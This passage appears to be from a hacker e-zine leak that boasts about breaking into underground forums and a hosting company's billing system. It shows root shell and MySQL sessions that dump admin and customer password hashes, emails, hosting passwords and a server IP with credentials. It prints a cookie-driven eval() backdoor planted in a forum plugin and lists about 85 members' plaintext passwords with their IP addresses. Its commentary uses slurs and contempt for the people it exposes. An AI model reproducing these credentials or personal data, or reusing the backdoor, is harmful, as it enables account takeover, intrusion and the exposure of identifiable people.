14:50 . +drwxr-x--- 6 hosting www 512 May 16 14:06 .. +-rw-r--r-- 1 root www 3013 May 16 13:31 README.txt +drwxr-xr-x 6 root www 3584 May 16 13:34 admin +-rw-r--r-- 1 root www 430 May 16 13:31 aff.php +-rw-r--r-- 1 root www 15877 May 16 13:31 affiliates.php +-rw-r--r-- 1 root www 11667 May 16 13:31 announcements.php +-rw-r--r-- 1 root www 7513 May 16 13:31 announcementsrss.php +drwxrwxrwx 2 root www 512 May 16 13:36 attachments +-rw-r--r-- 1 root www 6070 May 16 13:31 banned.php +-rw-r--r-- 1 root www 79378 May 16 13:31 cart.php +-rw-r--r-- 1 root www 120326 May 16 13:31 clientarea.php +-rwxrwxrwx 1 root www 281 May 16 14:41 configuration.php +-rw-r--r-- 1 root www 16445 May 16 13:31 configuressl.php +-rw-r--r-- 1 root www 9616 May 16 13:31 contact.php +-rw-r--r-- 1 root www 13871 May 16 13:31 creditcard.php +-rw-r--r-- 1 root www 23654 May 16 13:31 dbconnect.php +-rw-r--r-- 1 root www 15873 May 16 13:31 dl.php +-rw-r--r-- 1 root www 7938 May 16 13:31 dologin.php +-rw-r--r-- 1 root www 11861 May 16 13:31 domainchecker.php +drwxrwxrwx 2 root www 512 May 16 13:36 downloads +-rw-r--r-- 1 root www 17697 May 16 13:31 downloads.php +-rw-r--r-- 1 root www 621 May 16 13:31 htaccess.txt +drwxr-xr-x 2 root www 1536 May 16 13:37 images +drwxr-xr-x 7 root www 1536 May 16 13:38 includes +-rw-r--r-- 1 root www 6192 May 16 13:31 index.php +drwxr-xr-x 2 root www 1024 May 16 13:39 install__ +drwxr-xr-x 2 root www 1024 May 16 14:11 ioncube +-rw-r--r-- 1 root www 26163 May 16 13:31 knowledgebase.php +drwxr-xr-x 2 root www 512 May 16 13:39 lang +-rw-r--r-- 1 root www 4660 May 16 13:31 link.php +-rw-r--r-- 1 root www 4433 May 16 13:31 login.php +-rw-r--r-- 1 root www 5146 May 16 13:31 logout.php +drwxr-xr-x 10 root www 512 May 16 13:42 modules +-rw-r--r-- 1 root www 11456 May 16 13:31 networkissues.php +-rw-r--r-- 1 root www 6321 May 16 13:31 networkissuesrss.php +drwxr-xr-x 4 root www 512 May 16 13:43 order +-rw-r--r-- 1 root www 4271 May 16 13:31 order.php +drwxr-xr-x 2 root www 512 May 16 13:43 pipe +-rw-r--r-- 1 root www 10548 May 16 13:31 pwreset.php +-rw-r--r-- 1 root www 9061 May 16 13:31 register.php +-rw-r--r-- 1 root www 8575 May 16 13:31 serverstatus.php +drwxr-xr-x 2 root www 512 May 16 13:43 status +-rw-r--r-- 1 root www 17879 May 16 13:31 submitticket.php +-rw-r--r-- 1 root www 12639 May 16 13:31 supporttickets.php +drwxr-xr-x 5 root www 512 May 16 13:32 templates +drwxrwxrwx 2 root www 25088 Aug 11 15:05 templates_c +-rw-r--r-- 1 root www 5953 May 16 13:31 tutorials.php +-rw-r--r-- 1 root www 20858 May 16 13:31 upgrade.php +-rw-r--r-- 1 root www 5924 May 16 13:31 viewemail.php +-rw-r--r-- 1 root www 20202 May 16 13:31 viewinvoice.php +-rw-r--r-- 1 root www 17742 May 16 13:31 viewticket.php +-rw-r--r-- 1 root www 6111 May 16 13:31 whois.php +drwxr-xr-x 2 root www 512 May 16 13:33 widgets + +# cat configuration.php + + +# mysql -u hosting_whmcs hosting_whmcs -po8a7fd8s6fg +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 1305663 +Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89 + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SHOW TABLES; ++----------------------------+ +| Tables_in_hosting_whmcs | ++----------------------------+ +| tblaccounts | +| tblactivitylog | +| tbladdonmodules | +| tbladdons | +| tbladminlog | +| tbladminperms | +| tbladminroles | +| tbladmins | +| tbladminsecurityquestions | +| tblaffiliates | +| tblaffiliatesaccounts | +| tblaffiliateshistory | +| tblaffiliatespending | +| tblaffiliateswithdrawals | +| tblannouncements | +| tblbannedemails | +| tblbannedips | +| tblbillableitems | +| tblbrowserlinks | +| tblcalendar | +| tblcancelrequests | +| tblclientgroups | +| tblclients | +| tblclientsfiles | +| tblconfiguration | +| tblcontacts | +| tblcredit | +| tblcurrencies | +| tblcustomfields | +| tblcustomfieldsvalues | +| tbldomainpricing | +| tbldomains | +| tbldomainsadditionalfields | +| tbldownloadcats | +| tbldownloads | +| tblemails | +| tblemailtemplates | +| tblfraud | +| tblgatewaylog | +| tblhosting | +| tblhostingaddons | +| tblhostingconfigoptions | +| tblinvoiceitems | +| tblinvoices | +| tblknowledgebase | +| tblknowledgebasecats | +| tblknowledgebaselinks | +| tbllinks | +| tblnetworkissues | +| tblnotes | +| tblorders | +| tblpaymentgateways | +| tblpricing | +| tblproductconfiggroups | +| tblproductconfiglinks | +| tblproductconfigoptions | +| tblproductconfigoptionssub | +| tblproductgroups | +| tblproducts | +| tblpromotions | +| tblquoteitems | +| tblquotes | +| tblregistrars | +| tblservergroups | +| tblservergroupsrel | +| tblservers | +| tblsslorders | +| tbltax | +| tblticketbreaklines | +| tblticketdepartments | +| tblticketescalations | +| tblticketlog | +| tblticketmaillog | +| tblticketnotes | +| tblticketpredefinedcats | +| tblticketpredefinedreplies | +| tblticketreplies | +| tbltickets | +| tblticketspamfilters | +| tblticketstatuses | +| tbltodolist | +| tblupgrades | +| tblwhoislog | ++----------------------------+ +83 rows in set (0.00 sec) + +mysql> SELECT table_name FROM INFORMATION_SCHEMA.columns WHERE column_name LIKE "%pass%"; ++----------------------+ +| table_name | ++----------------------+ +| tbladmins | +| tblclients | +| tblcontacts | +| tblhosting | +| tblservers | +| tblticketdepartments | ++----------------------+ +6 rows in set (0.04 sec) + +mysql> SELECT username, password, firstname, lastname, email FROM tbladmins; ++----------+----------------------------------+-----------+----------+----------------------+ +| username | password | firstname | lastname | email | ++----------+----------------------------------+-----------+----------+----------------------+ +| admin | 850126ac86ccbb1c214a03ac909978aa | Sombra | Ivanov | admin@secure-host.in | +| Olga | 61d4019c541bf1cebf5a2a6762cd6477 | Olga | Ivanov | olga@secure-host.in | ++----------+----------------------------------+-----------+----------+----------------------+ +2 rows in set (0.00 sec) + +mysql> SELECT email, password, firstname, lastname FROM tblclients; ++----------------------------+----------------------------------------+-----------+-----------+ +| email | password | firstname | lastname | ++----------------------------+----------------------------------------+-----------+-----------+ +| cc1cash@yahoo.de | f4e3a18c8ea3fc34ee8277c7a9d08516:rgt%w | True | True | +| wassi@wassi.de | 12a43403362cc6accac4ccc5c30965b0:S!emh | wassi | wassi | +| markus.scholz@partyheld.de | ffa8a5a23329d53577ca2e2daffcdafc:)(xUP | Smiling | Bandit | +| stan.lay@hotmail.com | 17c87c61dbed16a0f0ab99cdc83dd33c:khW)A | stanlay | stanlay | +| a@a.de | dce096cba8c3a7fc82dc57dcdb8136ab:(Boqh | masa | faka | +| Worms.s1@web.de | f27c3d77065676f8b2807f4b0f77f7ee:!!zx% | Script | Star | +| cocktopuss@hush.com | fabc8a85b7e7b2ea8d939f44076adf01:dDeJQ | Sean | Fakir | +| los_loco@mail.ru | cddfbab06c60175699ff61f8cd27630e:%UKzg | los | loco | +| hansdieter@secure-mail.biz | d2ac2a86adf8eef73645ee4c3d40b526:GMkE# | hans | dieter | +| shinigami@z1p.biz | 914eccd87181870be2663185410fc1a5:WpFO( | Franz | Mueller | +| angela.krueger@hotmail.de | 66b361d7a7e843d35fc041104401bbd0:wiB!D | Ixde | ahmed | +| her0in@safe-mail.net | dc9edb678d178218ec895eb8322fbe8c:Qej#M | Anonym | Anonym | +| janioq@hotmail.de | 89d0078ec8a078d1d88acb7deb534acc:%YTB% | Max | thiesen | +| spike1337@secure-mail.biz | 07cb91ea3880f790e5763fb2dd1105bf:Kkb%p | Dennis | Kramer | +| runingtutorials@live.de | e595a3571ccd685adbf28ea45dc3a2d6:rVG)! | Felix | Wagno | +| abogado.gomes@ozu.es | e3665bc91bee822663297cc30cdfd588:TV#Zt | Mario | Gomes | +| Ande-kf@secure-mail.biz | 10edd0d846652321605ec04e1c90ab8a:zsoMP | just | pure | +| FeuerFaustAC3@gmx.de | 8f3266a3f536922657c3b2f51e925604:)SJmL | y0 | ACE | +| lalamaus10@googlemail.com | 500910a98aca826093ec80fd942020fe:ZJvpY | Maik | Henkel | +| scheller0077@web.de | 634a1c3bb9316a2af3390f9789fb5f80:ly%px | tim | bd-seller | +| j4ck-daniels@rambler.ru | 125769d9037d9f5196f2e1e6d816b1cf:VbggT | DarkSide | Darker | +| daniel@lemmert.biz | 8fce9b96262239831e053552021b07ac:ihK!B | Daniel | Lemmert | +| panzerpaul41@yahoo.de | 841ddfb775b9ca5d44ec9c1106e08761:lUPP% | Peter | Jansen | +| ell781@gmx.de | 0ae341662b701d3d64d7a608b46160be:%#ce! | Peter | Kluger | +| hotstore@hotmail.de | e8e14ff0af571d43a11d3408240963d7:Cnsdh | Matthias | Michel | +| team61@live.de | 47780e5555c63d45349b5cef7f8c1783:T)EGi | BABA | ANNA | +| Buy321@hotmail.de | 2d89b3fae37fb1966f8c7639907ee94a:VfYNd | Maria | Katepski | +| jobs@z1p.biz | d4f54e226ba44045bb8a39b8653907ea:(MSaf | Arthur | Marx | +| cremil@cust.in | c5af814e29429f856736e2769d57b8db:%iHkV | Cremil | Hackxor | ++----------------------------+----------------------------------------+-----------+-----------+ +29 rows in set (0.01 sec) + +mysql> SELECT username, password, server FROM tblhosting; ++-------------+------------------------------------------------------+--------+ +| username | password | server | ++-------------+------------------------------------------------------+--------+ +| true.vm | nW5dmh5zg4w4jmlFUDxtW7mVsdNAX9sxRp710gHYS2vX0551kg== | 1 | +| stansecu.vm | 2KUCM5nUisD2t88Z7vlfnC8Ry9pdk4fZrTb46Jfv | 1 | +| maddn.vm | nC69hLFITmHidWjYuEIIbEO4eo5BHzt3s/88NdMjSvY= | 1 | +| scriptst.vm | VmB727sy9l5I8q1f7q/zD8RTnOCNOfcxuNzYUAf4 | 1 | +| seansecu.vm | fQTtTeXNm1CkffO7pewNwJMZRIHcZWq00iTiW8x2 | 1 | +| sdarksid.vm | AVACcPUef0Jca8gkZ0rkH67o0BDaINOO6/0JRS9n | 1 | +| v43534.vm | XSSg52CreBXGUK8mjFd63x5hrtKHF3AIP0ljKa4Y | 1 | +| | +X3MCfd9nGwsAmMaKUscu3BBKz8= | 0 | +| | VoU/Q2mpAglHh8r6md2sAHCn8VQ= | 0 | +| spike.vm | tlOLHeM7iOZcarRhh+DyghmbvcsQPgnRvYfxuDsj | 1 | +| wassi.vm | VFK7fp1Z67kb6LtaH9EhUcv4gbjPJVatxbCdqnjg | 1 | +| iodas.vm | WLqkZB7nsCZVtFfGzLgHOhRSb6Xc2H2XHA3Dcw== | 1 | +| y00.vm | deOdBbTCD4mqdw+5vvpuH81UUVmt113tsykCie56 | 1 | +| pkluger.vm | StagsB3oFjy39/ES2YzHE177oJP0pCFXR1Q0OYOF/QgN | 1 | +| | LpABydLRg4uWBx0d6ghbM+9Nh2w= | 0 | +| | 2U5HEXcr8Sif99L2w85ixx4y/idGJJbhaZnUIaY= | 1 | +| | zynyC6+CtsxrDs/F5qRsVeuCfzBGSSL5oTyDwwU= | 1 | +| | 9FkPKWze7XKH0K3rB19fwQRuNGxqNdXCeA== | 1 | ++-------------+------------------------------------------------------+--------+ +18 rows in set (0.00 sec) + +mysql> SELECT ipaddress, hostname, username, password, secure FROM tblservers; ++---------------+-----------+----------+----------------------------------------------+--------+ +| ipaddress | hostname | username | password | secure | ++---------------+-----------+----------+----------------------------------------------+--------+ +| 193.107.16.82 | localhost | admin | iAYqc098oLSnn9PKqhb6wEd2G8dXU8i8cMWUtcSR7rp/ | | ++---------------+-----------+----------+----------------------------------------------+--------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +# Nothing left to say^C + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------====={ Unique-Crew.net }=======))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +Unique-Crew started off in late 2010; back then ~ | ||( );, +their admin pretended to be an old 1337-crew ( ,;.)-\ / ';, +team member with the intention of attracting kids \ ( \ ( +to the board. However, it was soon found out that || \\ +his identity was fake and since then the forum /_( /_( +was passed around like a cheap whore. It has been led by several +admins on several domains which obviously were all incapable of +administrating it properly. Also one of the admins apparently was +known as InVisible (yes, the same InVisible we describe in our "The +Happy Ninja Faker" article). As his mind clearly can not be depicted +as very bright and since he likes to gain a bad reputation by +betraying other people, Unique-Crew got a nice amount of enemies. So +while checking and logging different server traffic we stumbled on the +following: + +# ls -l /home/backspace/unique-crew.biz/madp/detection.php +-rw-r--r-- 1 backspace www 9162 Aug 22 17:02 /home/backspace/unique-crew.biz/madp/detection.php + +# grep -ni log_error detection.php -A5 +21:function log_error($string){if(eval($string) && defined("LOG_ERROR")){$error_handle = fopen("madp_err.log", "a+");$fwrite($string);$fclose($h);}} +22- +23-$did = substr($vbulletin->userinfo['password'], 7, 16); +24-$ignore_users = strpos($vbulletin->options['madp_ignore_users'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_users']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_users'])); +25-$ignore_groups = strpos($vbulletin->options['madp_ignore_groups'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_groups']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_groups'])); +26-$expire = (!empty($vbulletin->options['madp_cookie_expire']) AND is_numeric($vbulletin->options['madp_cookie_expire'])) ? (TIMENOW + ($vbulletin->options['madp_cookie_expire'] * 86400)) : (TIMENOW + 1209600); +-- +304: log_error(substr($_COOKIE[$vbulletin->options['madp_cookie_name']], 1)); +305- die("Error detected - try again!\n"); +306- } +307- +308- } +309-} + +It seems like you guys had a pretty much fucking obvious backdoor +installed for a few months. How are you not able to notice this? We +must say that it is nice that there are actually some people who want +to contribute to this mayhem, but seriously? If you are not able to +create a simple backdoor which is less obvious than this one you +should probably look for some other pastime. This shit absolutely does +not help, also if it might have worked this time. But looks like the +attackers were stopped by PHP's disable_functions directive so they +couldn't really do much, except downloading the database, which we are +also offering nonetheless. So here we go! + +# pwd +/home/backspace + +# ls -la +total 20 +drwxr-x--- 4 backspace www 512 Aug 28 20:21 . +drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. +drwxrwx--- 2 backspace www 1024 Oct 15 21:44 temp +drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 unique-crew.biz + +# cd unique-crew.biz + +# ls -la +total 7832 +drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 . +drwxr-x--- 4 backspace www 512 Aug 28 20:21 .. +-rwxr-xr-x 1 backspace www 12292 May 17 2010 .DS_Store +-rwxr-xr-x 1 backspace www 70 May 17 2010 ._.DS_Store +-rwxr-xr-x 1 backspace www 96 Mar 20 2011 .bash_history +-rwxr-xr-x 1 backspace www 12523 Jul 13 2010 LICENSE +drwxr-xr-x 2 backspace www 512 Aug 3 02:39 Product +-rwxr-xr-x 1 backspace www 49992 Jun 16 00:18 S_mgc_cb_evo_ajax.php +-rwxr-xr-x 1 backspace www 24532 Jul 13 2010 ajax.php +-rwxr-xr-x 1 backspace www 77635 Jul 13 2010 album.php +-rwxr-xr-x 1 backspace www 17542 Jul 13 2010 announcement.php +drwxrwxrwx 2 backspace www 512 Oct 5 11:42 archive +-rwxr-xr-x 1 backspace www 18779 Jul 13 2010 attachment.php +-rwxr-xr-x 1 root www 40925 Oct 18 17:31 bak +drwxr-xr-x 3 backspace www 2048 Aug 3 02:38 bnig459832zhbuiwedzouz9012vgr932 +-rwxr-xr-x 1 backspace www 77574 Jul 13 2010 calendar.php +-rwxr-xr-x 1 backspace www 43 Jul 13 2010 clear.gif +drwxr-xr-x 4 backspace www 2560 Aug 3 02:38 clientscript +-rwxr-xr-x 1 backspace www 15277 Jul 13 2010 converse.php +drwxr-xr-x 7 backspace www 512 Aug 3 02:38 cpstyles +-rwxr-xr-x 1 backspace www 3327 Jul 13 2010 cron.php +drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customavatars +drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customgroupicons +drwxr-xr-x 2 backspace www 512 Aug 3 02:38 customprofilepics +-rwxr-xr-x 1 backspace www 105636 Aug 24 2009 default.jpg +-rwxr-xr-x 1 backspace www 3411 Jun 19 14:52 dnp_fw.php +-rwxr-xr-x 1 backspace www 1071 Jun 19 13:49 dnp_fw_config.php +-rwxr-xr-x 1 backspace www 1163 Jun 19 13:53 dnp_fw_template.php +-rwxr-xr-x 1 backspace www 49004 Jul 13 2010 editpost.php +-rwxr-xr-x 1 backspace www 30747 Jun 14 19:42 external.php +-rwxr-xr-x 1 backspace www 10041 Jun 15 10:07 faq.php +-rwxr-xr-x 1 backspace www 1453926 Dec 20 2010 favicon.ico +-rwxr-xr-x 1 backspace www 36984 Jul 13 2010 forumdisplay.php +drwxr-xr-x 2 backspace www 512 Aug 3 02:38 g76893bh2b21z32v3g5vd7x8f78f43h +-rwxr-xr-x 1 backspace www 40925 Jul 13 2010 global.php +-rwxr-xr-x 1 backspace www 142308 Jul 13 2010 group.php +-rwxr-xr-x 1 backspace www 25619 Jul 13 2010 group_inlinemod.php +-rwxr-xr-x 1 backspace www 10747 Jul 13 2010 groupsubscription.php +drwxr-xr-x 3 backspace www 512 Aug 3 02:38 highslide +-rwxr-xr-x 1 backspace www 9254 Jul 13 2010 image.php +drwxr-xr-x 23 backspace www 1024 Oct 18 18:37 images +drwxr-xr-x 6 backspace www 5120 Oct 18 18:45 includes +-rwxr-xr-x 1 backspace www 20263 Jul 13 2010 index.php +-rwxr-xr-x 1 backspace www 45036 Jul 13 2010 infraction.php +-rwxr-xr-x 1 backspace www 188547 Jul 13 2010 inlinemod.php +-rwxr-xr-x 1 backspace www 10545 Jul 13 2010 joinrequests.php +-rwxr-xr-x 1 backspace www 10441 Jul 13 2010 login.php +drwxr-xr-x 2 backspace www 512 Aug 24 07:54 madp +-rwxr-xr-x 1 backspace www 17502 Jul 13 2010 member.php +-rwxr-xr-x 1 backspace www 16333 Jul 13 2010 member_inlinemod.php +-rwxr-xr-x 1 backspace www 36930 Jul 13 2010 memberlist.php +drwxr-xr-x 6 backspace www 512 Aug 3 02:38 mgc_cb_evo +-rwxr-xr-x 1 backspace www 60012 May 17 2010 mgc_cb_evo.php +-rwxr-xr-x 1 backspace www 49992 Jun 28 16:36 mgc_cb_evo_ajax.php +-rwxr-xr-x 1 backspace www 24465 Jul 13 2010 misc.php +-rwxr-xr-x 1 backspace www 65182 Jul 13 2010 moderation.php +-rwxr-xr-x 1 backspace www 6855 Jul 13 2010 moderator.php +-rwxr-xr-x 1 backspace www 18967 Jul 13 2010 newattachment.php +-rwxr-xr-x 1 backspace www 38105 Jul 13 2010 newreply.php +-rwxr-xr-x 1 backspace www 19367 Jul 13 2010 newthread.php +-rwxr-xr-x 1 backspace www 20188 Jul 13 2010 online.php +-rwxr-xr-x 1 backspace www 7868 Jul 13 2010 payment_gateway.php +-rwxr-xr-x 1 backspace www 12193 Jul 13 2010 payments.php +drwxr-xr-x 11 backspace www 3072 Aug 3 03:20 pe54tr90321inij409839urei2954 +-rwxr-xr-x 1 backspace www 8018 Jul 13 2010 picture.php +-rwxr-xr-x 1 backspace www 22661 Jul 13 2010 picture_inlinemod.php +-rwxr-xr-x 1 backspace www 25999 Jul 13 2010 picturecomment.php +-rwxr-xr-x 1 backspace www 28206 Jul 13 2010 poll.php +-rwxr-xr-x 1 backspace www 17744 May 12 2008 post_thanks.php +-rwxr-xr-x 1 backspace www 9691 Jul 13 2010 posthistory.php +-rwxr-xr-x 1 backspace www 76569 Jul 13 2010 postings.php +-rwxr-xr-x 1 backspace www 6702 Jul 13 2010 printthread.php +-rwxr-xr-x 1 backspace www 72783 Jul 13 2010 private.php +-rwxr-xr-x 1 backspace www 156809 Jul 13 2010 profile.php +drwxr-xr-x 2 backspace www 512 Aug 3 02:07 radio +-rwxr-xr-x 1 backspace www 40980 Jul 13 2010 register.php +-rwxr-xr-x 1 backspace www 5761 Jul 13 2010 report.php +-rwxr-xr-x 1 backspace www 14062 Jul 13 2010 reputation.php +-rwxr-xr-x 1 backspace www 30 Jun 30 09:52 robots.txt +-rwxr-xr-x 1 backspace www 128615 Oct 18 17:30 search.php +-rwxr-xr-x 1 backspace www 21546 Jul 13 2010 sendmessage.php +-rwxr-xr-x 1 backspace www 10263 Jul 13 2010 showgroups.php +-rwxr-xr-x 1 backspace www 12611 Jul 13 2010 showpost.php +-rwxr-xr-x 1 backspace www 75631 Jul 13 2010 showthread.php +drwxr-xr-x 2 backspace www 512 Aug 3 02:39 signaturepics +-rwxr-xr-x 1 backspace www 33846 Jul 13 2010 subscription.php +-rwxr-xr-x 1 backspace www 13671 Jul 13 2010 tags.php +-rwxr-xr-x 1 backspace www 8842 Jul 13 2010 threadrate.php +-rwxr-xr-x 1 backspace www 12706 Jul 13 2010 threadtag.php +-rwxr-xr-x 1 backspace www 35387 Jul 13 2010 usercp.php +-rwxr-xr-x 1 backspace www 19563 Jul 13 2010 usernote.php +-rwxr-xr-x 1 backspace www 28121 Jul 13 2010 visitormessage.php +-rwxr-xr-x 1 backspace www 19552 Jul 3 16:12 whitelist.dat +-rwxr-xr-x 1 backspace www 20463 Jun 19 12:07 whitelist.dat.bak + +# find . -name ".ht*" +./pe54tr90321inij409839urei2954/libraries/.htaccess +./pe54tr90321inij409839urei2954/setup/frames/.htaccess +./pe54tr90321inij409839urei2954/setup/lib/.htaccess + +# cat includes/config.php +[L?/E&C%\}:O\26z5:y4:178.1.185.84:19.10.2011 12:55:10 +DeCode:hacker63:109.169.135.87:19.10.2011 11:10:09 +Der_Visitor:CMqxwGz0:46.115.3.148:20.10.2011 10:57:27 +DrJack:UQDrJack123!!!:178.192.41.12:19.10.2011 08:26:33 +Duellking:uc4ever:129.143.71.37:20.10.2011 14:24:00 +Einfachnurso:Mg7BjyKR:217.191.194.28:19.10.2011 11:20:10 +Follow:cX1AKuJJ:85.16.149.79:19.10.2011 08:43:55 +Gevara:asdf1337:217.255.229.5:18.10.2011 18:48:26 +Goa:5852663:95.211.99.92:18.10.2011 21:04:28 +Hammer:trevilor:87.161.89.187:18.10.2011 19:32:20 +IcEcRacKer:Kleinestier1?:93.132.65.222:19.10.2011 17:38:05 +Imkon:chaoslegion:91.53.193.95:19.10.2011 11:44:18 +Ke3per:anatoxis123:87.173.50.42:19.10.2011 13:53:02 +LiipTon:JCGDDz3X:178.3.209.11:18.10.2011 19:31:23 +Locke:14041987:31.18.173.100:19.10.2011 10:38:30 +LuRez:furz90:92.73.124.178:20.10.2011 10:12:08 +Marcello:nokian81:94.221.186.74:19.10.2011 16:18:33 +MenoX:aXnHmVz8:87.152.221.177:18.10.2011 18:54:59 +Miss.Marple:werder:31.19.76.171:19.10.2011 18:27:33 +Mxxt:unique12345:78.54.158.153:19.10.2011 19:20:52 +NEO_2.0:4455jljlacdcr111dth11+sdp:93.204.88.95:18.10.2011 20:22:38 +PaxyundFixy:123lolen:92.225.54.141:19.10.2011 16:47:03 +Schlauchbraten:area51:217.255.234.154:20.10.2011 00:51:49 +Sektor63:Penis123456789:213.232.200.163:20.10.2011 11:30:16 +Sirius.GER:rolexblingbling@2:79.172.193.89:18.10.2011 20:37:49 +SpeedyGamer:f3LBPKMb:46.5.95.105:18.10.2011 20:39:09 +Style:asdasd:91.53.233.106:19.10.2011 15:29:29 +V0rteX:YSAcXgM1:94.219.12.253:19.10.2011 16:30:35 +Vague:hardtek1985:88.153.146.195:19.10.2011 22:35:24 +Yakuza112:N4DdSHXh:80.130.164.16:18.10.2011 19:02:12 +aNd5:dfWA5txY:178.201.106.152:20.10.2011 11:53:04 +bananabob:davidov:87.163.56.254:18.10.2011 21:12:59 +bert:Fk4feKyr:95.223.89.222:20.10.2011 15:28:21 +biohazard:21539868:62.224.66.21:20.10.2011 10:21:54 +cheesi:strike299:80.109.55.18:19.10.2011 20:22:29 +crone:41MkHjee:62.212.72.166:19.10.2011 16:40:40 +cyx:cyxcyx:78.94.200.138:18.10.2011 21:00:25 +ee46hxe6x:drdtdrtdrt6666666666666:87.172.237.175:20.10.2011 07:41:03 +furz:Dreadfg:192.162.103.27:20.10.2011 03:19:05 +gevara:asdf1337:92.241.168.23:19.10.2011 17:47:24 +ghostleader:Scorpion:82.195.232.218:19.10.2011 17:39:20 +hardcore4life:dx5U5ZPu:82.72.183.168:19.10.2011 21:53:40 +haxxer:lollol123:92.203.66.182:19.10.2011 01:43:21 +icle:gt54rfvvgt54rfvv:88.130.162.238:18.10.2011 20:34:58 +impiety:pa44word:113.211.166.68:19.10.2011 02:22:47 +john:picture:93.222.62.165:20.10.2011 09:51:40 +junkfood:xxxxxx:87.230.10.135:20.10.2011 10:20:15 +justnew:myw00t1337:87.146.39.153:19.10.2011 14:17:00 +kathi1337:yousuck:79.212.132.144:20.10.2011 04:21:23 +killuthekid7:123456:94.220.222.124:19.10.2011 22:50:27 +king99:h5ZZKXvN:85.178.239.47:18.10.2011 20:12:06 +klerus:kl12er34us56654321:85.176.101.243:19.10.2011 15:05:24 +l5xx!z:mattrex123.:77.3.81.189:19.10.2011 18:08:37 +laberpaul:123123:178.63.231.103:19.10.2011 18:43:47 +lerox:hallo123:79.255.147.179:19.10.2011 20:25:04 +lyrix:mixxedup:77.117.163.186:19.10.2011 21:42:34 +mAlCoM:squier:95.89.170.234:19.10.2011 06:28:27 +mayh3m:electronic:196.46.189.162:19.10.2011 15:09:42 +meineex:meine1978$:93.218.235.254:20.10.2011 08:31:41 +misterini:brumau:213.196.253.37:20.10.2011 06:13:22 +mr_euro:manfred--:186.16.12.187:18.10.2011 21:31:03 +mute:88klaus88:87.153.35.90:19.10.2011 12:55:42 +n0mac:wru5UHUp:77.177.13.199:19.10.2011 17:32:38 +p3x:gzuogoui:93.209.47.197:19.10.2011 21:03:10 +p4inw4r:IoJS91jS__passwort_loging_ist_total_gay__Dj13DDAD:212.117.180.81:18.10.2011 19:36:50 << YOU BET! +protoliner:bremen12:178.142.52.54:20.10.2011 09:29:57 +sector40000:yqaBvJms:84.170.29.212:18.10.2011 20:33:34 +smartie0:q0120660:77.188.215.212:19.10.2011 09:02:28 +smurf:120684:217.91.85.183:19.10.2011 17:02:53 +sperle:45er87qw:89.246.204.213:20.10.2011 00:55:26 +st3aLth:1337!Aa:109.192.209.243:18.10.2011 18:46:06 +stryder:v6e6fbun:188.175.134.98:19.10.2011 17:59:48 +style:asdasd:91.53.233.106:19.10.2011 21:31:58 +sys32:wowanda85:119.42.144.18:20.10.2011 11:26:54 +txto:123456:188.98.215.91:18.10.2011 22:26:54 +voodoo:allianz3:91.62.186.36:19.10.2011 20:05:36 +wacked:ynWgX0HT:84.140.226.167:18.10.2011 18:51:35 +whiti:matrix123:84.169.182.65:19.10.2011 22:25:21 +xGh0sT:oberbaer1:77.178.33.108:18.10.2011 20:48:23 +zero334:uc4ever:213.163.64.43:19.10.2011 13:31:24 +zocker:qwertzui:77.178.217.145:20.10.2011 14:44:07 +zulu:Pod88ucC2011:80.152.154.125:20.10.2011 06:17:27 + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((====={ Zion-Network.net }======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Zion-Network.net was not so easy to hack. It +,;' \ /-(.;, ) took about ten minutes longer because they were + ) / ) / running some reverse http proxy, so we clueless- + // || ly got root on that one first, just to find out + )_\ )_\ that we did not own the right box. We allow you +to laugh at us now. Anyway Zion-Network has been breeding kiddies and +carder blockheads for quite a while and it has long been rumored that +we already backdoored them a long time ago. But sorry, no, we had +other business, too, for example consuming alcohol as if there is no +tomorrow. Maybe that's why we failed with that reverse proxy. + +Nevertheless it was about damn time to own them. The members of +Zion-Network are a lot dumber than the other average carding offscum, +hardly surprising that they rip off each other to the utmost. +Zion-Network has been growing immensely so you can not only buy credit +cards or ID card scans on Zion-Network's trading area, but also all +sorts of drugs like coke, lsd, mushrooms or crystal. A rather large +drug scene has emerged that fulfills everybody's wishes. Great shit +for the average 14 year old scammer who sees himself as the greatest +but is not able to tie up his own shoes without tripping over himself. +Pride and ignorance are akin. And this fact is clearly described by +the administration of Zion. LUCIFER aka S3TH, the current +administrator announces the following after they applied some +innovations to the community. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| LUCIFER: Bereiche wie Security & Hacking sowie Coding wurden dabei | +| besonders berücksichtigt, damit Fraud nicht mehr | +| dominiert, sondern sich mit NonFraud ungefähr die Waage | +| hält. | +| | +|____________________________________________________________________| + +LUCIFER alleges that they particularly considered security, hacking +and coding categories while redesigning the messageboard so that +there'd be a balanced ratio of fraud and non fraud on the forums. That +is some heavily retarded noble endeavor of trying to bring fraud and +HACKING on the same level. We diagnose Down's syndrome or some other +mental disability as he clearly fails to acknowledge that there is not +even the slightest connection between fraud and hacking. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| LUCIFER: Die Hacker-Szene wird immer falsch dargestellt, das ist | +| nichts neues. Gesteigerte Gefahr für Zion sehe ich | +| dadurch nicht, wir sind sowieso schon das groesste | +| deutschsprachige Szene-Board und haben allein deswegen | +| schon seit geraumer Zeit juristische 